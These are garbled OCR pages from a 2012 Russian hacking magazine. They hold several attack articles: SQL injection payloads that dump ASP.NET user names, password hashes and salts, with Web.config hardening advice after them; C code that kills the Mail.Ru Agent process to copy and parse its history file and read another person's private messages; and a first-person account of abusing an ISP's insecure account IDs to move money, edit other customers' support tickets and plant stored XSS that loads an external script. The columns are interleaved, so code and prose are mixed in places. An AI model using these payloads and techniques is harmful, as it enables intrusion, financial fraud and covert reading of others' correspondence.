те, поэтому ты сможешь угнать его сессию. Наша операция переходит исключение:
в активную фазу. Открывай web-страницу ELMAH и ищи информацию
о куках сотрудника службы поддержки. Скорее всего у тебя в руках System.Data.SqlClient.SqlException (0x80131904):
окажется что-то аналогичное: Incorrect syntax near the keyword 'select'.
Incorrect syntax near '%'.
Unclosed quotation mark after the character string ''.

О чем говорит эта ошибка? Во-первых, сайт построен на базе

СУБД SQL Server. Во-вторых, поле ввода ключевого слова не филь-
труется. Теперь у тебя должно быть достаточно информации для
проведения атаки.
Кстати, ELMAH позволяет не только убедиться, что на странице
есть SQL-инъекция, но и автоматизировать поиск подобных уязви-
мостей на других страницах. Поэтому первым делом при анализе
логов обрати внимание на ошибки с типом Sql. Ты также можешь
скачать список ошибок в формате CSV, воспользовавшись ссылкой
http://localhost/MusicStore/elmah.axd/download, и затем произвести
дальнейший анализ в Microsoft Excel или при помощи скриптов.
Для начала давай попробуем получить список всех альбомов. Воз-
вращайся на страницу поиска и вводи следующий текст: "' or 1
Конфигурация ELMAH по умолчанию в Web.config тестового сайта = 1 --". Получил? Отлично. Теперь давай попробуем сделать что-

058 ХАКЕР 04 /159/ 2012

 ASP.NET: темная сторона трассировки

WWW
• Сайт ELMAH
(исходный код,
документация и т.д.):
code.google.com/p/
elmah.
• Репозиторий
NuGet: nuget.org.
• учебное web-
приложение ASP.
NET MVC Music Store:
mvcmusicstore.
codeplex.com/.;
• Firebug:
getfirebug.com.
• Firecookie:
bit.ly/gMhx7B.
• Visual Web Devel-
oper 2010 Express:
bit.ly/ldalNH.;
• SQL Server 2008
Express:
bit.ly/AtJpCt.
• Утечка системной
информации через
систему трассировки
ASP.NET (Trace.axd):
bit.ly/xaZzSn.

Пример информации об ошибке в Web-интерфейса ELMAH

нибудь более серьезное, например получим список пользователей использую стандартные средства безопасности ASP.NET, причем
и хеши паролей. изменения вносятся только в Web.config и не требуют перекомпи-
Music Store, разработанный при помощи ASP.NET MVC и SQL ляции приложения. Если твое приложение использует авториза-
Server, использует авторизацию через web-формы (это следует из цию пользователей через web-формы, то тебе помогут следующие
того, что при авторизации создается кукис .ASPXAUTH). Мож- рекомендации:
но предположить, что разработчики решили воспользоваться 1. Сначала удали регистрацию ELMAH из разделов configuration/
системой авторизации, которая идет в поставке ASP.NET, начиная system.web/httpHandlers и configuration/system.webServer/
с версии 2.0. Если все сходится, то информация о пользовате- handlers файла Web.config;
лях хранится в таблицах aspnet_Users и aspnet_Membership. 2. После этого добавь в раздел configuration следующий XML:
Чтобы знать наверняка, выполни следующий запрос: "Hits'
and exists(select 1 from sys.tables where name = 'aspnet_ <location path="elmah.axd">
Users') --". Запрос вернул результат — ты на верном пути. <system.web>
Теперь осталось получить список пользователей. Предположим <httpHandlers>
(если интересно, то можешь посмотреть исходный код страницы), <add verb="POST,GET,HEAD" path="elmah.axd"
что скрипт запрашивает из базы данных два поля: идентифика- type="Elmah.ErrorLogPageFactory, Elmah" />
тор альбома и название. Тогда попробуем выполнить следующий </httpHandlers>
запрос: <authorization>
<allow roles="Administrator" />
select 1, u.UserName + ':' + m.Password + ':' + <deny users="*" />
m.PasswordSalt from dbo.aspnet_Users as u </authorization>
inner join dbo.aspnet_Membership as m on u.UserId = </system.web>
m.UserId <system.webServer>
<handlers>
И теперь еще один запрос, только в виде эксплойта для формы <add name="Elmah" path="elmah.axd"
поиска: verb="POST,GET,HEAD"
type="Elmah.ErrorLogPageFactory, Elmah"
"' and 1 <> 1 union all select 1, u.UserName + ':' + preCondition="integratedMode" />
m.Password + ':' + m.PasswordSalt from dbo.aspnet_Users </handlers>
as u inner join dbo.aspnet_Membership as m on u.UserId = </system.webServer>
m.UserId --" </location>

КАК СЕБЯ ОБЕЗОПАСИТЬ? Готово! Теперь только пользователь c ролью Administrator

Как видишь, средства, облегчающие жизнь разработчикам сможет просматривать логи ELMAH, а это именно то, что нам нужно.
и службе поддержки, могут быть очень опасны, если использо-
вать их по принципу «поставил и забыл». Сразу хочу отметить, НАПОСЛЕДОК
что описанные выше проблемы с безопасностью — это не ошибка Надеюсь, я смог показать тебе, как безопасные на первый взгляд
в ELMAH, а ошибка в конфигурации web-приложения. Более того, средства для разработчиков и сотрудников службы поддержки
защититься от подобных проблем можно довольно просто. Я сам могут нанести непоправимый вред компании при условии, что
повсеместно использую ELMAH и отключать его в обозримом безопасность приложения неправильно сконфигурирована. Всегда
будущем не планирую, тем более, что в моем случае это зачастую думай о последствиях и никогда не полагайся на принцип «поста-
единственное доступное средство отладки. Поэтому я всегда вил, работает, не трогай». z

ХАКЕР 04 /159/ 2012 059

ВЗЛОМ Gar|k ([email protected])

ВЗЛОМ
Mail.Ru Агента
ПОЛУЧАЕМ ДОСТУП К ИСТОРИИ
ПЕРЕПИСКИ И КОНТАКТАМ
В ПОПУЛЯРНОМ МЕССЕНДЖЕРЕ

Ты вряд ли пользуешься Mail. WARNING ИСТОРИЯ ВЗЛОМА

Ru Агентом, но это бешено Не забывай о статье Эксперимент начался для меня еще в далеком 2008 году, когда
138 — «Нарушение друг попросил проверить переписку его девушки в Mail.ru Аген-
популярный сервис, который тайны переписки,
телефонных те. Тогда файл истории представлял из себя простой текстовик
с каждым днем набирает переговоров, с названием *email*history.txt и имел по сравнению с mra.dbs
почтовых, (файл, в котором в настоящее время хранится история переписки
обороты. По официальным телеграфных или
иных сообщений» и данные о контактах) примитивную структуру. За пару часов был
данным месячная аудитория УК РФ, а также
о наличии в ней
написан простой, но эффективный RTF-конвертер, который и де-
лал всю грязную работу по вытягиванию переписки из Агента.
этого мессенджера в конце главы 28 —
«Преступления Друг был в восторге. Далее, в ходе изучения программирова-
прошлого года составляла в сфере
компьютерной
ния на компилируемых языках, я в качестве практики написал
программу Mail.ru History Reader, описание которой попало на
безумную цифру в 21,4 информации» (ст.
272, 273, 274). страницы ][ в августе 2009 года. Получив большое количество
миллиона человек. Это положительных отзывов, я опубликовал структуру формата
DVD тогдашнего файла истории (см. ссылки в боковом выносе) и ис-
легко объяснить, — продукт ходники читалки. Однако Mail.ru Агент продолжал развиваться,
На диске ты найдешь
действительно удачный. Но пример читалки и править балом стал новый продвинутый файл mra.dbs. После
сегодня я хочу рассказать истории mra.dbs, этого события ко мне посыпались тонны сообщений от различ-
реализацию класса,
упрощающего
ных людей с просьбами заняться им. В компании с SOLON7 мы
о том, как был разреверсен исследование ковыряли этот файл в HEX-редакторе, пытаясь найти структуры,
бинарных файлов
файл с историей сообщений в WinHex-редакторе,
ссылки на смещения и всевозможные изменения после запуска
и другие материалы Mail.ru Агента. К концу 2010 года после долгих поисков формат
пользователя. по статье все-таки покорился.

060 ХАКЕР 04 /159/ 2012

 Взлом Mail.Ru Агента

КАК ДОБЫТЬ ФАЙЛ MRA.DBS?

Ты, конечно, задашься вопросом: а где, собственно, хранится
этот пресловутый mra.dbs, и как его добыть? Файл mra.dbs
хранится в папке «%APPDATA%\Mra\Base\mra.dbs» (напри-
мер «C:\Documents and Settings\user\Application Data\Mra\
Base\mra.dbs»), и заполучить его при выключенном Агенте
не так уж и сложно, достаточно лишь использовать функции
ExpandEnvironmentStrings и CopyFile. Однако при включенном
Агенте файл mra.dbs является занятым и система попросту не
позволит его использовать. Для решения этой проблемы можно,
например, временно отключить Агент (для этого действия тебе
понадобятся привилегии отладчика, которые можно получить
только с правами Администратора) или найти открытый хэндл
файла в системе, а затем продублировать его в адресное про-
Идентификаторы начала переписки
странство своего процесса. Также можно прочесть файл напря-
мую с диска (правда, для этого нужно знать, что такое кластер
и как работать напрямую с драйвером файловой системы) или pid=pe32.th32ProcessID;
же написать собственный файловый драйвер (это практически break;
нереально). Все бы хорошо, но на практике у всех вышепере- }
численных методов есть свои недостатки. При перечислении }
хэндлов с помощью ZwQuerySystemInformation и их копировании while(Process32Next( hProcessSnap, &pe32 ));
к себе в процесс с помощью DuplicateHandle можно столкнуться }
с двумя проблемами. Первая заключается в том, что при вызове CloseHandle( hProcessSnap );
ZwQueryInformationFile поток может повиснуть, ожидая отклика }
от блокирующего именованного канала. Вторая — после копиро-
вания оба хэндла (наш и открывшего файл процесса) будут ука- После того как мы найдем PID, нам необходимо получить
зывать на один FileObject, а следовательно — текущий режим привилегии отладчика SeDebugPrivilege (OpenProcessToken >
ввода-вывода. Позиция в файле и другая связанная с файлом LookupPrivilegeValue > AdjustTokenPrivileges) и убить процесс
информация будут общими у двух процессов, поэтому даже (OpenProcess > TerminateProcess), а потом снова попытаться вы-
чтение файла вызовет изменение позиции чтения и нарушение звать CopyFile. Привилегии можно получить и более элегантным
нормальной работы программы, открывшей файл. Конечно, путем — через Native API:
можно приостановить на время все потоки процесса файла, а по-
сле копирования восстанавливать позиции чтения и запускать void GetPrivilege(IN ULONG Privilege)
процесс владельца снова, но это связано с большими затратами {
времени и сил. Казалось бы, идеальным методом может являть- BOOLEAN OldValue;
ся прямое чтение с диска, но и здесь есть недостатки. Таким RtlAdjustPrivilege(Privilege, TRUE, FALSE, &OldValue);
способом можно читать только файлы, которые открываются }
с доступом FILE_READ_ATTRIBUTES (кроме файлов подкачки),
файл обязательно должен быть не сжат, не зашифрован (иначе Все, mra.dbs у нас в руках. Теперь перейдем к его потрошению :).
мы прочитаем ерунду) и иметь свой кластер (маленькие файлы
в NTFS могут целиком размещаться в MFT). Также следует РАСКРЫВАЕМ СЕКРЕТЫ MRA.DBS
учесть, что во время чтения файл может быть изменен (и мы Файл mra.dbs представляет из себя дамп памяти Mail.ru Агента,
получим в результате непонятно что). Поэтому разберем самый поэтому открыть его для чтения при работающей программе не
простой метод с временным отключением процесса Агента. представляется возможным (для рядового программиста, но у нас
Итак, чтобы убить процесс Mail.ru Агента, для начала не- свои секреты :), также задачу усложняет тот факт, что в памяти
обходимо узнать его идентификатор (ProcessID). Сделать это все числа хранятся в перевернутом виде. Однако давай немного
можно разными способами: через ToolHelp API, через Native API углубимся в реверс-инжиниринг.
(используя функцию ZwQuerySystemInformation), прошерстив Итак, в недрах mra.dbs существует хеш-таблица, в которой
список открытых хэндлов или по списку открытых процессом описаны смещения на 4-байтные идентификаторы. Идентифика-
окон (GetWindowThreadProcessId). Самый легкий вариант — это торы служат для определения начала записи различных структур
использование ToolHelp API и поиск по имени exe-файла. Для и сегментов дампа, среди которых и находятся нужные нам записи
этого достаточно вызвать функции CreateToolhelp32Snapshot > истории переписки (обрати внимание на соответствующую иллю-
Process32First > Process32Next, а затем в теле цикла сверять страцию):
значение поля szExeFile структуры PROCESSENTRY32 c magent.
exe. Необходимый нам ProcessID находится в этой же структуре, typedef struct _ids {
поле th32ProcessID: unsigned int id1;
unsigned int id2;
hProcessSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); unsigned int count;
if( INVALID_HANDLE_VALUE != hProcessSnap) } _ids;
{
pe32.dwSize = sizeof( PROCESSENTRY32 ); Начало истории характеризуется ключевым словом
if( Process32First( hProcessSnap, &pe32 ) ) mrahistory_, за которым следует e-mail хозяина файла mra.dbs
{ и e-mail контакта, с которым ведется переписка. В случае с исто-
do рией идентификаторы образуют двусвязный список: первый ведет
{ к первому отправленному сообщению, а второй — к последнему
if(0 == lstrcmp(pe32.szExeFile,_TEXT("magent.exe"))) принятому сообщению. Количество сообщений можно узнать,
{ изучив четыре байта после идентификаторов (структура _ids).

ХАКЕР 04 /159/ 2012 061

ВЗЛОМ

Структура записи сообщения Поиск хеш-таблицы

Пройдя по смещению идентификатора (его можно узнать из хеш- структуре хранится количество записей истории или, проще
таблицы) мы попадем на запись сообщения (снова все внимание на говоря, количество переписок. Так как файл дампа постоянно
соответствующий рисунок): расширяется, то по смещению 0x2C лежит идентификатор послед-
ней записанной истории, — это все, что нам нужно знать, чтобы
struct _message начать искать идентификаторы переписок.
{ В целом же алгоритм такой:
unsigned int size; • проходимся по идентификаторам записей истории с помощью
unsigned int prev_id; цикла (начиная от последней добавленной записи);
unsigned int next_id; • если в этой записи от смещения 0x190 присутствует слово
unsigned int xz1; «mrahistory_», то это означает, что по смещению 0x24 лежат
FILETIME time; идентификаторы цепочки сообщений данной переписки.
unsigned int type_mesage;
char flag_incoming; Чтобы стало немного понятней, взгляни на этот код:
char byte[3];
unsigned int count_nick; DWORD * offset_table=(DWORD *)(mra_base +
unsigned int magic_num; // 0x38 *(DWORD*)(mra_base + 0x10));
unsigned int count_message; DWORD end_id_mail=*(DWORD*)(mra_base+0x20+
unsigned int xz2; offset_table[1]);
unsigned int size_lps_rtf; DWORD count_emails=*(DWORD*)(mra_base+0x2C+
unsigned int xz3; offset_table[1]);
}; ...
for(int i=0;i<count_emails;i++)
Строки в дампе сохраняются в кодировке Unicode (wchar_t) раз- {
личными способами: _ids *mail_data=(struct _ids*)(mra_base+
• с завершающим нулем в конце строки; offset_table[end_id_mail]+4);
• в структуре LPS (название структуры взято из описания фор- if(memmem(((unsigned char*)mail_data+0x190),
мата протокола MMP), где первые четыре байта указывают на mrahistory,...))
длину последующей строки; {
• в формате RTF. emails[k].id=(_ids*)((unsigned char*)mail_data+0x24);
...
Зная количество сообщений, нам не составит труда пробежать- }
ся по всей цепочке. Но откуда вообще узнать, где находится эта end_id_mail=mail_data->id2;
хеш-таблица, и как найти начало записей истории? Над поисками }
ответов к этим вопросам мы с SOLON7 провели немало бессонных
ночей. КОДИМ
Журнал не резиновый, поэтому исходный код читалки mra.dbs ищи
НЕМНОГО МАГИИ на диске. Сейчас я покажу тебе лишь самые основные моменты.
По смещению 0x10 от начала файла mra.dbs, как оказалось, и хра- Итак, файл mra.dbs является дампом памяти, поэтому мы не будем
нится адрес заветной хеш-таблицы. Пройдя по смещению первого извращаться и использовать функции для работы с файловыми
индекса из хеш-таблицы, мы натыкаемся на структуру началь- смещениями, а сразу поместим его в память нашей программы. Для
ных данных. Возможно, там находится вообще вся информация, этого заюзаем ресурсы ОС Windows и создадим Memory Mapped
заложенная в mra.dbs. Идем дальше. По смещению 0x20 в этой файл:

ТИПЫ СООБЩЕНИЙ MRA.DBS

2 4 7 10 35 46
неавторизованные запросы обычные передача записи смена
пользователи авторизации сообщения файлов в микроблог геоположения

062 ХАКЕР 04 /159/ 2012

 Взлом Mail.Ru Агента

WWW INFO
• Описание формата Хеш-таблица — это
истории Mail.ru структура данных,
Агента до версии 5.4: реализующая
bit.ly/z2ETMY; интерфейс
• обсуждение Mail.ru ассоциативного
History Reader: массива, она
bit.ly/xZoKvU; позволяет хранить
• мой блог: пары «ключ-
c0dedgarik.blogspot. значение».
com; Двусвязный
• С++ класс для список состоит из
создания winhex. элементов данных,
pos-файлов: каждый из которых
bit.ly/zsTJTb; содержит ссылки
• три метода как на следующий,
работы с занятыми так и на предыдущий
файлами: элементы.
bit.ly/zNgQ2S;
• различные
способы получения
списка процессов:
bit.ly/w4upzS;
• уменьшение
размера Си-
программы на
примере Visual
Studio:
bit.ly/w7sWNA.

Интерфейс моей читалки

После прохода по идентификаторам и поиска строки

CreateFile «mrahistory_» наша структура будет заполнена адресами иден-
CreateFileMap тификаторов. Заметь, при этом мы не скопировали даже байта
MapViewOfFile и израсходовали всего лишь 16*count_emails байт (например, при 1
VirtualFree 000 контактов мы используем всего ~15 килобайт памяти). Теперь,
CloseHandle имея на руках идентификаторы начала переписки с конкретным
CloseHandle пользователем, мы можем прочитать сообщения:

Так как нам не нужно сохранять внесенные изменения обратно int id_message=emails[k].id->id1;
в файл, то здесь вместо UnmapViewOfFile используется VirtualFree. for(int i=0;i<emails[k].id->count_messages;i++)
Первое, что мы сделаем, это найдем все контакты из истории пере- {
писки. Хранить найденное добро будем в структуре emails: _message*mes=(_message*)(mra_base+
offset_table[id_message]);
typedef struct _emails{ wchar_t*str=(wchar_t*)((unsigned char*)mes+
wchar_t *email; sizeof(_message));
_ids *id; ...
}; id_message=mes->prev_id;
... }
struct _emails *emails;
... Дата сообщения хранится в формате FILETIME, для удобства
emails=VirtualAlloc(0,count_emails*sizeof(struct _emails),..); ее можно перевести в удобочитаемый вид с помощью функции
FileTimeToSystemTime. Формат RTF отлично воспринимается
Rich Edit’ом и любыми другими стандартными редакторами типа
WordPad. Но с этим можно и не заморачиваться, так как сообще-
ния хранятся в неотформатированном виде сразу после ника, а их
RICH TEXT FORMAT (RTF) размер указан в структуре message. Это все, что тебе нужно знать,
чтобы получить удобоваримый список мессаг из Агента.

RTF, использующийся в mra.dbs, представляет из себя формат P.S.

хранения размеченных документов, предложенный еще в 1982 году К сожалению, формат журнала не позволяет привести здесь мои
бородатыми программистами из Microsoft и Adobe. Для его парсинга хардкорные изыскания полностью, поэтому поспеши заглянуть на
совершенно не обязательно изобретать велосипед, а достаточно диск. Надеюсь, пример кода читалки (exe’шник которой, кстати, с по-
лишь отправить сообщение EM_STREAMIN с флагом SF_RTF для мощью небольшой оптимизации уместился всего в 2 килобайта безо
записи и EM_STREAMOUT с флагом SF_TEXT для чтения: всяких пакеров) поможет тебе в написании быстрого и крутого C-кода,
а также в изучении hex-редакторов и других низкоуровневых вещей.
EDITSTREAM es = { 0 }; Кстати, незатронутой осталась не менее увлекательная тема чтения
es.pfnCallback = EditStreamCallback; истории ICQ-переписки, которая также хранится в файле mra.dbs.
es.dwCookie = (DWORD_PTR)&lps; Спасибо компании Mail.Ru, во-первых, за разработку Mail.Ru Агента,
SendMessage(hRich, EM_STREAMIN, SF_RTF, (LPARAM)&es); во-вторых, за заметное развитие любимой аськи, и в-третьих, за
интересный квест, о котором я тебе сегодня рассказал. z

ХАКЕР 04 /159/ 2012 063

ВЗЛОМ Daeren Torn

БУДНИ WARNING
Вся информация
предоставлена
исключительно
в ознакомительных
целях. Ни редакция,
ни автор не несут

халявщика
ответственности за
любой возможный
вред, причиненный
материалами данной
статьи.

Эта история взлома была бы ничем не

НЕВЫДУМАННАЯ примечательна, если бы не одно «но». Жертвой
ИСТОРИЯ О СЕРЬЕЗНЫХ глупейших ошибок программистов стал довольно
крупный провайдер. Элементарные уязвимости
УЯЗВИМОСТЯХ в личном кабинете пользователя позволяли
манипулировать денежными средствами на счете
ПРОВАЙДЕРА любого из клиентов. Такое Увы, и такое бывает.

064 ХАКЕР 04 /159/ 2012

 Будни халявщика

ОТВЕТ НЕ ЗАСТАВИЛ СЕБЯ

ЖДАТЬ, — ПОКАЗАЛАСЬ
ФОРМА С ПРЕДЛОЖЕНИЕМ
ПЕРЕВОДА СРЕДСТВ. БИНГО!
После
*****09 : -85р | Основной счет
*****61 : -71р | Интернет
*****60 : 0р | Телевидение

Как ни странно, данная операция прошла успешно. Epic fail.

Интернет, впрочем, у меня от этого не появился, поэтому я снова
обратился к html-исходнику страницы своего личного кабинета.
Изучив его более подробно, я заметил следующие input-префиксы:
«m_from» и «m_to». Все указывало на то, что это были идентифи-
каторы счетов в БД! Здесь возник резонный вопрос: отслеживает
ли сервер подмену ID? Недолго думая, я стал проверять свою до-
гадку: изменил две последние цифры в поле «m_from», применил
изменения, выбрал нужные счета и нажал на кнопку «Оплата».
Запрос с измененным ID ушел на сервер. Ответ не заставил себя
ждать, — показалась форма с предложением перевода средств.
Бинго! Номер счета, откуда будут переведены средства, не со-
впадал с моим номером, а в поле «Укажите сумму» была указана
Страница перевода средств
сумма, равная количеству средств на счете, с которого осущест-
влялся перевод. Как ты помнишь, на моем счете в тот момент было
ВВЕДЕНИЕ -85 рублей, а форма предлагала мне перевести все 290! Указав
История началась очень странно. На календаре было 31 декабря, немногим меньшую сумму (для незаметности), я нажал «Переве-
а на ноутбуке — дисконнект. Средства на счете закончились, сти», — и операция завершилась успехом. Значит, уязвимость есть,
и было совершенно непонятно, что дальше делать всю ночь без сервер не проверяет ID на привязанность к аккаунту. Программи-
интернета (в новогоднюю-то ночь? — прим. редакции)? На счете сты, браво! Вернув деньги обратно, я решил углубиться в поиски
Webmoney не было достаточно денег, чтобы полностью оплатить других багов. Тут сразу стоит отметить, что все эти эксперименты
абонентскую плату, поэтому я уже готов был идти к ближайше- могли серьезно испортить мне жизнь, — повезло, что провайдер
му терминалу оплаты. Зайдя в личный кабинет, чтобы уточнить решил не обращаться с заявлением о моих действиях в правоохра-
стоимость абонентки, я обратил внимание на неактивные html- нительные органы. В такой ситуации оправдаться у меня уже не
переключатели, расположенные на странице перевода средств. получилось бы.
Похоже, Дед Мороз все-таки существует :).
УЧЕТ ОПЕРАЦИЙ
БЫТЬ ИЛИ НЕ БЫТЬ? Итак, предыдущая находка меня очень обрадовала. Теперь
Дальше я полез в исходный код страницы с помощью браузера осталось узнать, насколько видны мои действия второму лицу.
Opera и убрал у соответствующих переключателей параметр Ведь у каждого уважающего себя провайдера есть такая вещь как
«disabled» (когда баланс равен нулю или отрицательный, то дан- статистика/история платежей, предназначенная для того, чтобы
ный переключатель неактивен). После этого нехитрого действия я следить за передвижением средств на счетах. Перейдя к истории
применил изменения и попробовал перевести все средства с тре- платежей, я снова открыл исходный код страницы. Немного поли-
тьего счета на первый – основной: став его, я сразу заметил тот же самый способ работы с ID. Для его
передачи серверу использовалась строка следующего вида:
До
*****09 : 15р | Основной счет <input type=button value='Показать' name=show_orders_list
*****61 : -71р | Интернет onClick='showPay(this.form, ***39)'>
*****60 : -100р| Телевидение

Первый баг с переводом средств

ХАКЕР 04 /159/ 2012 065

ВЗЛОМ

Здесь я снова изменил ID и немедленно нажал «Показать», —

опять успех: я увидел все операции со средствами на чужом ID!
Но там был и мой след. Значит, все мои действия с деньгами были
заметны второму лицу. Однако все равно здесь не было видно, куда
и почему они были переведены, — таблица представляла из себя
три столбца: «Дата», «Сумма (руб.)» и «Номер учетного документа».

БОЛЬШЕ, БОЛЬШЕ КРОВИ!

Ладно, с этим все ясно, но что можно сделать еще? На глаза по-
палась кнопка «Запрет доступа», отключающая все предоставляе-
мые провайдером услуги. Работала она также с ID и JS. Конечно,
увидеть работоспособность этой вещи я не мог. Или же можно было
написать скрипт, который прошелся бы по списку ID и отключил
всем пользователям интернет/телевидение/телефон – даешь
хлеба и зрелищ :). Однако одним запретом доступа я ограничи-
ваться не захотел и попытался разобраться во всем этом на более
глубоком уровне.
Итак, вернувшись к операциям над средствами, я запустил
прогу Charles (charlesproxy.com — замечательный снифер,
дебаггер и прокси-сервер в одной упаковке). Но данные шиф-
ровались, и ничего толкового я не увидел. Тогда я запустил IE
Тикеты службы поддержки
с плагином ieHTTPHeaders, перешел в личный кабинет и произвел
уже знакомую тебе транзакцию средств с одного счета на другой.
ieHTTPHeaders показал следующий запрос: она на методе Basic Authentication. Мне хватило всего пары минут,
чтобы накидать программу для брутфорса. Благо, все дороги были
POST /client.php открыты, а доступ в личный кабинет осуществлялся по локальной
xjxfun=changeChack&xjxargs[]=***18&xjxargs[]=***39& сети, то есть интернет не был нужен, и все могло произойти очень
xjxargs[]=120.0 и очень быстро...
Впоследствии я рассказал об обнаруженной уязвимости IT-
Здесь ключи массива такие: 1 — с какого счета, 2 – на какой отделу провайдера, так что она была довольно быстро исправлена.
счет, 3 – сколько денег переводить. Далее я решил попробовать Ошибку объяснили тем, что «все работало через хитрую схему,
сформировать аналогичный предыдущему GET-запрос и перешел поэтому так глупо и вышло» :).
по сформированной ссылке. Все снова работало, средства перево-
дились. Я думаю, теперь ты понимаешь, что можно было натворить НОВЫЕ БАГИ
при помощи базовых знаний JS и больной фантазии? К слову, тут Проходит день, неделя, месяц, и у меня появляется желание про-
мне вспомнился фильм }{0ТТ@БЬ)Ч: «- А сколько качать-то? — Че верить что-нибудь еще в личном кабинете. Я открыл страницу
ты тупые вопросы задаешь? Миллион качай!». просмотра статистики, изменил ID, отправил запрос. В итоге на
моем экране вновь отобразилась чужая статистика. Оказалось,
ЧТО-ТО ЕЩЕ? что после прошлого исправления корректно стало работать только
Далее я подумал, что можно копнуть еще глубже. В самом начале тот раздел личного кабинета, где осуществлялся перевод средств,
каждого из html-исходников была такая строка: js/func.js. Хорошо, а все остальное так и осталось по-прежнему. Я не захотел ковы-
формирую ссылку, перехожу по ней и вижу реализацию функций ряться дальше со старыми багами, поэтому попробовал найти еще
операций на сайте. Самой нужной мне вещью оказалась функция места, где использовался столь оригинальный метод работы с кон-
saveNewPass() — она работала по той же схеме ID+JS. Как ясно из фиденциальными данными пользователей. Тут стоит заметить, что
названия, предназначена эта функция для смены пароля пользо- меня уже давно интересовал раздел «Электронные заявления».
вателя. Все, что нам надо, — код, который бы осуществлял про- Зайдя туда, я создал бессмысленный вопрос: «Почему e-mail не
стейший перебор по словарю и менял его при условии нахождения привязывается к учетной записи?». Страница с вопросом содержа-
верной комбинации. Какова вероятность того, что все пользова- ла довольно интересную информацию: ФИО + IP. Также присутство-
тели изменили стандартные пароли (обычно состоящие всего из вала возможность правки сообщения, а вот кнопка удаления не
нескольких цифр)? Кстати, тут не было даже банальной капчи или работала. В исходном коде нашлась такая строка:
блокировки по IP при множественных ошибочных авторизациях
и других запросах! Да и авторизация тоже хромала — основана <a href="JavaScript: edit_post(***01, ***1)"
class=z11><font class=z11>Редактировать</font></a>

Я поправил значения, вычтя из каждого по 3, применил измене-

ния, нажал «Редактировать» и увидел страницу с тикетом другого
ВСЕ, ЧТО НАМ НАДО, — КОД, пользователя! Изменив его, я попробовал сохранить вопрос, —
операция завершилась успехом. После, еще раз изменив значение,
КОТОРЫЙ БЫ ОСУЩЕСТВЛЯЛ я попал уже на ответ техподдержки. Поправил, сохранил, — все
получилось. Значит, я могу править сообщения любого юзера!
ПРОСТЕЙШИЙ ПЕРЕБОР ПО Осталось лишь найти остальные функции для работы с заявками.
Снова немного покопавшись в исходном коде страницы, я отыскал
СЛОВАРЮ И МЕНЯЛ ЕГО ПРИ строку следующего вида:

УСЛОВИИ НАХОЖДЕНИЯ <script language='JavaScript' src='js/hd.js'></script>

ВЕРНОЙ КОМБИНАЦИИ. Собственно, в файле js/hd.js и лежали функции для работы

066 ХАКЕР 04 /159/ 2012

 Будни халявщика

с заявлениями. Я решил использовать функцию showTiket(n).

Поправив код и указав произвольный номер заявления, я при-
менил изменения и нажал на кнопку «Редактировать». Открылась
страница, на которой был запрос пользователя, а также ответы от
техподдержки. Вроде бы ничего такого, но я увидел их ФИО и IP!
Кстати, злоумышленник в такой ситуации мог бы подождать ответа
техподдержки любому пользователю, а после отредактировать
сообщение, например, так: «Скачайте (...) для устранения про-
блемы, но антивирус может ругаться на данное приложение, так
что отключите его на время». Вуаля! Троян залит, да еще и от лица
провайдера.

А КАК ЖЕ XSS?
Хорошо, я нашел способы редактирования, удаления, просмо-
тра и отправки тикетов. Идем дальше. Вернувшись в личный
кабинет, я решил поискать XSS. Потратив достаточно времени
на поиски, я не нашел уязвимых мест (так мне тогда казалось).
Однако дальше, взглянув на раздел под названием «Контактная
информация», я увидел, что у каждого из трех полей («e-mail»,
История перевода средств
«Телефоны» и «Телефон для SMS-уведомлений») есть кнопка
для редактирования. Телефоны, это понятно, должны иметь
очевидную фильтрацию цифра/не цифра, но вот поле «e-mail» xjxfun=saveEmail&xjxr=1328363403426&xjxargs[]=TEST
вполне может содержать в себе баг. Я попробовал протолкнуть xjxfun=saveTel&xjxr=1328363361153&xjxargs[]=000000000000
простой код: xjxfun=saveSMSTel&xjxr=1328363389834&
xjxargs[]=000000000000
<script src="http://***/o.js" type="text/javascript" >
</script> Открываю переменную xjxr, составляю GET-запрос, выполняю
его и проверяю — все работает, значения сохраняются. Теперь не-
Естественно, все это дело спровоцировало ошибку «Введен много изменим запрос сохранения e-mail’а:
некорректный e-mail». Хорошо, возвращаюсь к IE и смотрю, что мне
говорит «ieHTTPHeaders»: /client.php?xjxfun=saveEmail&xjxargs[]=
<script src="http://***/o.js" type="text/javascript" >
POST /client.php HTTP/1.1 </script>
...
В o.js находится обычный alert(“XSS”);. Выполняю — успех!
Мой ядовитый текст успешно был сохранен. Далее я решил
обновить главную страницу личного кабинета и сразу же увидел
выскочивший alert. Что может быть лучше активной XSS на глав-
ной странице личного кабинета любимого провайдера? Однако
этого мне было мало, необходимо добить еще два поля. Вот что
я сделал:

• /client.php?xjxfun=saveTel&xjxargs[]=000000000000
<script src="http://***/o.js" type="text/javascript" >
</script>
• /client.php?xjxfun=saveSMSTel&xjxargs[]=000000000000
<script src="http://***/o.js" type="text/javascript" >
</script>

Снова все успешно! Видимо, разработчики не рассчитывали на

то, что кто-то допишет их код. Здесь следует учесть, что макси-
мальная длина кода, который возвращался на странице, составля-
ла 260 символов, так что три уязвимых поля были весьма кстати.

ПОДВОДЯ ИТОГИ
Уже позже от сотрудников IT-отдела я узнал, что некоторые фай-
лы сайта не редактировались с 2008 года. Убогий код с огромным
количеством уязвимостей остался как наследие от работавших
ранее программистов.
Как такой биллинг работал в течение долгого времени, я пред-
ставляю с трудом. Но теперь еще больше уверен, что детские
уязвимости в виде полного отсутствия пользовательского кода
встречаются повсеместно, даже если речь идет о серьезных
компаниях, которые имеют дело с личными данными пользова-
телей и их денежными средствами. К счастью, текущая команда
программистов быстро исправила все ошибки на сайте. z
Отображаем произвольные страницы через активную XSS

ХАКЕР 04 /159/ 2012 067

 elf (icq: 7719116)
ВЗЛОМ cj (icq: 3708307)

DVD
Ищи на диске:
Если ассоциировать SecuROM
v7.33.17 с танком Абрамсом без
ВНЕДРЕНИЕ Х-КОДА • Полную
версию данного
исследования;

динамической защиты, OllyDbg И ВИРТУАЛЬНАЯ • SecuROM_7 Profiler

v1.0;
• Материалы по
— с гранатометом РПГ-7, а X- работе SecuROM 7

code injection — с кумулятивной МАШИНА: ТЕОРИЯ & VM;

• Исходники X-code
injection (txt-bin);
гранатой для гранатомета,
то, как и в реальности,
И ПРАКТИКА • Видео «X-code
injection
в действии!»

такой выстрел навзничь

ВВЕДЕНИЕ на сумасшедшую «популярность» SecuROM во
прошьет броню этой тяжелой Стратегия Tiberium Wars до сих пор явля- всем мире, в нашей стране редко когда можно
